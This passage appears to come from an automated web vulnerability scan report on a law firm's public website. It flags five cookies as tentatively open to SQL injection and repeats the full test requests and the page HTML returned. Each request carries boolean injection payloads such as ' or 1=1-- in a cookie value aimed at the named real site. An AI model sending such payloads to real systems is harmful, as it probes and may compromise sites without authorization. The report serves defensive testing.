<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.12. http://www.pillsburylaw.com/ [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 14379774%20or%201%3d1--%20 and 14379774%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814379774%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 19:51:18 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814379774%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11825844;path=/
Set-Cookie: CFTOKEN=79486011;path=/
Date: Thu, 12 May 2011 19:51:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.13. http://www.pillsburylaw.com/ [MEDIAUSERID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 75248224'%20or%201%3d1--%20 and 75248224'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=75248224'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 19:51:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=75248224'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.14. http://www.pillsburylaw.com/ [MEDIAUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 99881169'%20or%201%3d1--%20 and 99881169'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=99881169'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 19:51:56 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=99881169'%20or%201%3d2--%20; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.15. http://www.pillsburylaw.com/ [PCONNECTID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 33124684'%20or%201%3d1--%20 and 33124684'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=33124684'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 19:51:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=33124684'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.16. http://www.pillsburylaw.com/ [PCUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 16656756'%20or%201%3d1--%20 and 16656756'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=16656756'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 19:51:40 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=16656756'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

